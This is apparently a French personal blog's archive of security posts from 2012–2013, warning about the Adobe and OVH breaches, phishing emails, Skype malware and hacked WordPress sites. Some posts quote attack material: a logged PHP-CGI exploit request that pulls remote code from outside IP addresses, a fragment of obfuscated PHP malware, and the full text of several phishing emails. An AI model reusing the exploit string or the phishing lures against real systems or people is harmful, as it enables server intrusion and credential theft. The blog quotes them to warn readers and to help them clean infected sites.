hack

09-10-2013

Changez votre mot de passe de votre compte adobe suite à un piratage

Alors vous voulez changer votre mot de passe de votre compte adobe ? quelle bonne idée, surtout que 3 millions de comptes clients viennent d'être piratés

Et bien allez sur ce lien

http://www.adobe.com/go/passwordreset

Saisissez votre adresse email lié à votre compte

Vous recevrez par la suite un mail qui vous proposera un lien pour changer votre mot de passe

cs-auto@adobe.com

Adobe Systems Incorporated Reset Your Adobe ID Password

Il suffit ensuite de saisir deux fois votre mot de passe ...

Dean

09-10-2013

Important Password Reset Information : si si adobe a été piraté …

Adobe Customer Care - Important Password Reset Information (email@mail.adobesystems.com)

Et oui ça arrive à tout le monde, personne n'est complètement à l'abris du piratage ...
Cette fois ci c'est au tour d'adobe .

Pas loin de 3 millions de comptes piratés chez adobe (identifiants - mots de passe - numéros de cartes de crédit)

Adobe vous demande de réinitialiser les mots de passe de comptes concernés par cette attaque.

Pas de bol alors si vous recevez ce mail, ça veut dire que votre compte est concerné...

Par sécurité il est conseillé de modifier les mots de passe de vos autres comptes ayant le même identifiant/mot de passe

Adobe Customer Care

Important Password Reset Information

We recently discovered that an attacker illegally entered our network and may have obtained access to your Adobe ID and encrypted password. We currently have no indication that there has been unauthorized activity on your account.

To prevent unauthorized access to your account, we have reset your password. Please visit www.adobe.com/go/passwordreset to create a new password. We recommend that you also change your password on any website where you use the same user ID or password. In addition, please be on the lookout for suspicious email or phone scams seeking your personal information.

We deeply regret any inconvenience this may cause you. We value the trust of our customers and we will work aggressively to prevent these types of events from occurring in the future. If you have questions, you can learn more by visiting our Customer Alert page, which you will find here.
Adobe Customer Care

Ce n'est pas du spam, ce n'est pas du phishing ...

Dean

08-10-2013

Faille php : /?-dsafe_mode%3dOff…61.19.253.26 etc … tentative de hack sur serveur

Une vulnérabilité php permet l'éxécution de code php distant

La requête envoyée pour tester la faille.

/?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt
php -dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://81.17.24.83/send.txt

Cette vulnérabilité permet l'exécution du fichier echo.php stocké sur le serveur avec ip 61.19.253.26

Cette faille ne touche que les serveurs dont php fonctionne en mode CGI (avant 5.3.12 et 5.4.x avant 5.4.2)

Vérifiez votre version php:
La commande pour connaitre sa version php sur linux - debian - ubuntu server

php --version

Pour bloquer rapidement l'adresse à partir du serveur ip par iptable:
115.248.250.105 correspond à l'adresse ip utilisée pour détecter la faille ...

iptables -A INPUT -s 115.248.250.105 -j DROP

30-09-2013

Concours de hack pour contourner la protection Touch ID (lecteur biométrique) iphone 5S

Le système Touch ID de l'iphone 5S permet d'utiliser les empruntes digitales du propriétaire pour ajouter une couche de protection au smartphone (en plus du code pin ...)

Apple se voulant rassurant sur la fiabilité de son nouvel iphone 5s vient a lancé un concours.

Quoi de mieux que de lancer un défi aux hackeurs ?

"Is Touch ID hacked yet ?" http://istouchidhackedyet.com

Evidemment le système a été hacké ... par Chaos Computer Club en utilisant une copie de l'empreinte digital d'un doigt

Is Touch ID hacked yet ?

23-07-2013

Votre Apple ID … Appe ID ne_pas_repondre@apple.fr

Attention => phishing / hameçonnage .....

Ne cliquez pas sur des liens suspects

webmail.net-star.net : 32001/mail/images/final.html

Appe ID ne_pas_repondre@apple.fr
Return-Path: me@localhost.com
Received: from mail.us.klinelogistics.com (mail.us.klinelogistics.com. [63.148.13.254])

Chère/Cher Client ....
Votre identifiant Apple a été utilisé pour ouvrir une session iCloud à partir d'un
ordinateur non autorisé..
Votre compte iTunes est maintenant bloqué, veuillez accéder à votre compte
afin de vérifier vos informations.
Vérifiez Maintenant

23-07-2013

OVH - comment changer votre mot de passe du compte

Et oui ovh c'est fait hacker ...
Il faut mettre à jour vos mots de passe!!!

- Page d'accueil de votre manager, en bas allez sur Actions => Administration
- Page Récapitulatif - Administration, allez sur Accès aux sections => Mes paramètres
- Page Paramètres de mon compte client, allez sur Mot de passe

23-07-2013

Le mot de passe de kdxxxxx-ovh - siège social ovh peut-être hacké …

Une base de donnée ovh du siège social concernant les clients Europe a peut-être été hacké ...

Bonjour,
Récemment, nous avons relevé un incident de securité sur notre réseau interne
au siège social d'Ovh.
...
Nous avons relevé que la base de données des clients Europe aurait pu être illégalement
copiée. Cette base comporte les données suivantes :
le nom, le prénom, le nic, l'adresse, la ville, le pays, le téléphone, le
fax et le mot de passe chiffré
...

Changez vos mots de passe .....

08-07-2013

sample@email.tst hack, vulnérabilité formulaire de contact

300 mails au moins avec comme expéditeur sample@email.tst

bon bon ... cherchons ....

1 Commentaire

04-07-2013

WordPress hack (picline - nihana - roy - by appstore ) etc….

There are iTunes phishing pages at
wp-content/Identification/
wp-content/Identification/inscription/index.php
plugins/apple-espace-clients-Fr-id8732KE902KCN393872928/
plugins/apple-espace-clients-Fr-id8732KE902KCN393872928/inscription/index.php
There are hacker tools and files at
wp-content/plugins/1.php (29 Jun 13 1747)
wp-content/plugins/picline.php
wp-content/picline.php
wp-content/plugins/By-Appstore-Fr-service-Verification-ID00293934782847GT.zip
wp-content/plugins/nihaha.php
wp-content/plugins/roy.asp

25-06-2013

$zen_framework hack par plugin wordpress …..

Un code malicieux en provenance d'un plugin wordpress

Le code malicieux (en php) vérifie si vous êtes un spider, si ce n'est pas le cas il affiche des données en provenance d'un autre site ....

$zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); //$zend_framework("",.....\103\x6e\60\x3d\42\x29\51\x3b\57\x2f");

lien

http://www.justbeck.com/zend_framework-wordpress-hacks/

Solutions:
- Faire une restauration de votre site (pas de sauvegarde ??? !!!!)
- Ensuite pensez à mettre à jour vos plugins ....

Si vous n'avez pas de sauvegarde essayez de supprimer les codes (sauvegardez avant au cas où ça ferait encore plus de dégats....)

Mon code de nettoyage sous linux

find ./ -type f -exec sed -i 's/<?php \/\/$zend_framework[^>]*>//g' {} \;

25-06-2013

Roguekiller « le sous système requis pour prendre en charge » …

Et oui encore une version de ce virus informatique qui nous fait perdre du temps....
Le problème c'est que le boot en mode sans echec ne fonctionne pas....
Alors il faut booter en mode restauration

Alors pour commencer il faut télécharger une version de Roguekiller (http://tigzy.geekstogo.com/roguekiller.php), choisissez la bonne version 32 ou 64

Pour un système ibm (thinkcentre)

- booter en mode restauration (touche F8 au démarrage, tapez plein de fois dessus)

- lancez la console de ligne de commande

- insérez la clef usb contenant Roguekiller (un programme ecrit en C++ permettant de nettoyer le virus en partie)

- exécutez RogueKiller

si vous avez le message

Le sous système requis pour prendre en charge le type d'image n'est pas présent

Alors c'est que vous n'avez sans doute pas la bonne version (32 ou 64 bit ?)

une fois le nettoyage fait il faut aussi supprimer manuellement le l'exécutable qui a introduit le virus...

pour ma part il se trouve sur le lien suivant

D:\Users\monNomUser\AppData\Local\Temp\daunqudjuxvhqbbkr.exe
D:\Users\monNomUser\AppData\Local\Temp>del daunqudjuxvhqbbkr.exe

Bon c'est du vrac mais ça devrait vous aider un peu à comprendre la manip

Ensuite il faut installer un antivirus, le mettre à jour et faire un scan complet
Installez pa la même occasion malewarebyte (malwarebytes.org) version Free

29-04-2013

ça me gave ces tentatives d’intrusion: 27.159.214.5

Le pire c'est que ça fait trois jours selon les logs ...

/?page=login&cmd=register
/index.php?page=en_Signup
/?do=/user/register/
/signup.php
/index.php?action=registernew
/?option=com_registration&task=register
/index.php?option=com_registration&task=register
/profile.php?mode=register&agreed=true&coppa=0
/ucp.php?mode=register
/index.php?app=core&module=global&section=login
/index.php?act=Login&CODE=00
/YaBB.cgi/
/join.php
/YaBB.pl/
/registration_rules.asp?FID=0

14-10-2012

vcvd message video=> attention

vcvd vcvd.net ????
Méfiez des messages videos et avec des liens, ce sont tous des arnaques ....
Le serveur du site vcvd.net vient d'ukraine ....(lié aussi à idvdo.com, idvdo.net, ppvd.net et deux autres domaines), serveur de spam...

Vcvd
Linda vous a laisse un Message video à 20:25

http://vcvd.net

http://vcvd.net/1sp/p3

acces non surtaxe
hors cout WAP

+33626625660 0626625660, 33624885921 0624885921

Résultats Whois:
IP:193.169.86.18
Serveur Mail:smtp.secureserver.net
Serveur:Ukraine - Vinnyts'ka Oblast' - Ivanov
Registrar: GODADDY.COM, LLC
Name Server: NS61.DOMAINCONTROL.COM
Registered through: GoDaddy.com, LLC (http://www.godaddy.com)
Updated Date: 12-mar-2012
Creation Date: 12-mar-2012
Expiration Date: 12-mar-2013

Les infos concernant l'IP

193.169.86.18
org-name: PE Ivanov Vitaliy Sergeevich
address: 42-A Tobolskaya street, office 230, Kharkov, Ukraine
person: Ivanov Vitaliy
phone: +380 57 728 12 67

5 domains hosted on IP address 193.169.86.18
idvdo.com
idvdo.net
ppvd.net

Linda vous a laisse un Message
Léa vous a laisse un Message

42 Commentaires

13-10-2012

Vcvd.net Message vidéo, acces non surtaxé = arnaque

+33626625660 0626625660

sms
Ne cliquez pas sur le lien, c'est du mensonge, de l'arnaque, du spam ....
Et oui, le spam du week-end !

Vcvd
Linda vous a laisse un Message video à 20:25
Pour le consulter, cliquez
xxxx://vcvd.net/1sp/p3

acces non surtaxe hors cout WAP

33624885921 0624885921

Plus d'infos sur vcvd:
http://www.zenbien.com/vcvd-message-video-attention

3 Commentaires

12-10-2012

VÉRIFICATION DE VOTRE COMPTE GOOGLE MAIL => ATTENTION !!

VÉRIFICATION DE VOTRE COMPTE GOOGLE MAIL

%%%%%% Nouvelle- Struct/ure- sur -les -co/mptes %%%%%%
L\\\'EQuiPe informe son aimable clientèle qu\\\'une vérification
s\\\'impose à tous nos utilisateurs en vue de garantir une meilleure navigation sur un autre site ,
cela est dû à de nombreuses actions frauduleuses détectées depuis le début de cette année sur
nos serveurs ,alors nous vous invitons à vous faire identifier par notre serveur de
messagerie tout en garantissant l\\\'accès à votre -comp-te-
**Nom & Prénom
*Date de naissance
**ADre*SSe Gm??a-i*l
**Mot de passe
**Adresse de messagerie Secours
**Mot de passe
**Pays
**Ville
**N° Téléphone
**N° Mobile
**Fonction
V-euillez considérer ce message comme étant le dernier a-vertissement avant la
d.ésactivation de
votre m.essageri.e.
Groupe Gmail

Received: from hostingsmtp.register.it (hostingsmtp04.register.it. [81.88.50.245])
Reply-To: servicecourriermail@mail.com

Ils sont vraiment trop cons ces gens qui envoient ce genre de mail, ils pourraient au moins bien formater le contenu, crédibilité zero

22 Commentaires

10-10-2012

Hey c’est votre nouvelle photo de profil => attention cheval de troie Skype

Hey c'est votre nouvelle photo de profil http://goo.gl/Ya6Se?image=username (Skype_todaysdate.zip)

Attention, le lien de téléchargement zip contient un troyen - trojan (cheval de troie) ...

Plus d'infos ici =>http://www.zenbien.com/skype-attention-malware-troyen-trojan

10-10-2012

Skype, attention malware, troyen trojan

Un ver informatique essai de se propager en exploitant l'API skype.
Un message spam affiche (toutes les 20 minutes) un lol accompagné d'un lien de téléchargement (fichier zip Skype_todaysdate.zip)
Le fichier contient un cheval de troie - troyen ou trojan....

Ce troyen permet de prendre le contrôle d'un ordinateur sur Windows.

Source: génération NT

L'ordinateur infecté pourrait rejoindre les rangs d'un botnet (Dorkbot)
Possibilité de tomber sur une attaque de type ransomware, demande de rançon
L'utilisateur est informé que ses fichiers ont été cryptés et il doit payer de 200 dollars sous 48 heures sous peine de suppression.
lol is this your new profile pic? http://goo.gl/Ya6Se?image=username

- C2C service

Info sur skype:
http://heartbeat.skype.com/2012/10/malicious_activity_in_skype_ch.html

We take the user experience very seriously, particularly when it comes to security. We are aware of some recent reports of malicious activity and are working quickly to take appropriate action to protect users. We continue to recommend upgrading to the latest version of Skype and applying updated security features on your computer. Additionally, following links - even when from your contacts - that look strange or are unexpected is not advisable

13-09-2012

Information importante concernant la connexion de votre compte => phishing sur gmail

Attention ne vous faites pas avoir !!!

Cher Utilisateur(G.oogle/Mail)-!‏‏
service.verification-ip@consultant.com
Sender: salamat.lahcen@gmail.com
From: account supports

Information importante concernant la connexion de votre compte
Google propose la réinitialisation de tous les comptes
alors (G)mail vous informe de la mise à jour de notre base de données.
Cette opération se fera dans les 24h qui suivront alors pour la
conservation de votre compte email. Nous vous recommandons de
remplir le formulaire ci-dessous:

Loginadresse-(MAIL+):.............
(Mo-t de P*asse*):.................
(Numéro* De M.obile):...............
(Dat-e *De N.aissance*):............
(P.rofession ):.................
(No-m Et P.rénoms):...............
(Pays**):..........................
-TOUS REFUS AURONT LES COMPTES SUS/SPENDU!!
Si vous souhaitez créer un nouveau compte, accédez à la page

https://accounts.google.com//NewAccount?hl=fr

©2012 Cordialement

17-07-2012

Apple Store : une application SPAM = Find and Call

Selon Kaspersky l’application Find and Call présente sur l’App Store récupère les contacts à l’insu de l’utilisateur puis envoie des courriels et SMS publicitaires à tous les destinataires.
Kaspersky dénonce la présence de l’application Find and Call qui transfert sur ses serveurs les contacts du carnet d'adresse puis envoie ensuite des messages publicitaires à toutes les personnes en affichant le numéro du mobile source pour leurrer les destinataires.

Si Find and Call ne représente pas une réelle menace, son fonctionnement est bien celui d’un logiciel malveillant.

Source:
securelist.com
businessmobile.fr

07-07-2012

1 mois de forfait illimité et gratuit = idemnisation orange ? => Attention piratage - phishing

De faux mails (orange) circulent annonçant "1 mois de forfait illimité" en dédommagement

Faites attentions...

NE DONNEZ PAS VOS COORDONNEES BANCAIRE

Piratage dans l'air !

lien:
zataz.com

phishing def sur orange:
Dans la plupart des cas de phishing par mail, les pirates expédient massivement des messages en usurpant l'identité d'une banque ou d'un commerce en ligne, et redirigent vers un faux site Web les internautes qui se sentent concernés par le message.

et conseils:
N'envoyez pas d'informations personnelles par mail.
Ne répondez pas aux mails vous demandant la saisie d'informations confidentielles et ne cliquez pas sur les liens qu'ils contiennent ; les institutions légitimes ne demandent jamais ce genre de renseignements par mail.
Vérifiez que l'adresse d'un site web sécurisé commence bien par "https://" même si ce n'est pas une condition suffisante pour garantir la légitimité d'un site.
N'ouvrez pas les pièces jointes aux mails que vous pouvez recevoir, à moins de connaître l'intégrité de l'expéditeur. Méfiez-vous par ailleurs de l'adresse email de celui-ci. Il est aisé de la déguiser.
Utilisez un antivirus à jour ainsi qu'un firewall et appliquez les correctifs publiés pour colmater les failles de sécurité de votre système d'exploitation.